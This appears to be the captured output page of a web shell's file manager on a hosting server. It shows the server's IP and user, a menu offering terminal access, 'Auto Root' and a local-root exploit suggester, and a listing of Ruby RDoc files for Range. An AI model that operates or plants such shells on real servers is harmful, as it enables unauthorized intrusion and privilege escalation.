Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
Range /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d%3d-i.ri
773
B
-rw-r--r--
2023-07-26 17:38
%3d%3d-i.ri
680
B
-rw-r--r--
2023-07-26 17:38
as_json-i.ri
369
B
-rw-r--r--
2023-07-26 17:38
begin-i.ri
433
B
-rw-r--r--
2023-07-26 17:38
bsearch-i.ri
2.57
KB
-rw-r--r--
2023-07-26 17:38
cdesc-Range.ri
3.24
KB
-rw-r--r--
2023-07-26 17:38
cover%3f-i.ri
738
B
-rw-r--r--
2023-07-26 17:38
each-i.ri
937
B
-rw-r--r--
2023-07-26 17:38
end-i.ri
450
B
-rw-r--r--
2023-07-26 17:38
eql%3f-i.ri
692
B
-rw-r--r--
2023-07-26 17:38
exclude_end%3f-i.ri
519
B
-rw-r--r--
2023-07-26 17:38
first-i.ri
532
B
-rw-r--r--
2023-07-26 17:38
hash-i.ri
465
B
-rw-r--r--
2023-07-26 17:38
include%3f-i.ri
734
B
-rw-r--r--
2023-07-26 17:38
inspect-i.ri
412
B
-rw-r--r--
2023-07-26 17:38
json_create-c.ri
417
B
-rw-r--r--
2023-07-26 17:38
last-i.ri
753
B
-rw-r--r--
2023-07-26 17:38
max-i.ri
656
B
-rw-r--r--
2023-07-26 17:38
member%3f-i.ri
732
B
-rw-r--r--
2023-07-26 17:38
min-i.ri
659
B
-rw-r--r--
2023-07-26 17:38
new-c.ri
528
B
-rw-r--r--
2023-07-26 17:38
pretty_print-i.ri
232
B
-rw-r--r--
2023-07-26 17:38
size-i.ri
616
B
-rw-r--r--
2023-07-26 17:38
step-i.ri
1.09
KB
-rw-r--r--
2023-07-26 17:38
to_json-i.ri
481
B
-rw-r--r--
2023-07-26 17:38
to_s-i.ri
382
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI" last:ETI"Range#last;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"+Returns the last object in the range, ;TI"*or an array of the last +n+ elements.;To:RDoc::Markup::BlankLine o; ; [I"LNote that with no arguments +last+ will return the object that defines ;TI":the end of the range even if #exclude_end? is +true+.;T@o:RDoc::Markup::Verbatim; [ I"(10..20).last #=> 20 ;TI"(10...20).last #=> 20 ;TI")(10..20).last(3) #=> [18, 19, 20] ;TI"((10...20).last(3) #=> [17, 18, 19];T:@format0: @fileI"range.c;T:0@omit_headings_from_table_of_contents_below0I"0rng.last -> obj rng.last(n) -> an_array ;T0[ I"(*args);T@FI" Range;TcRDoc::NormalClass0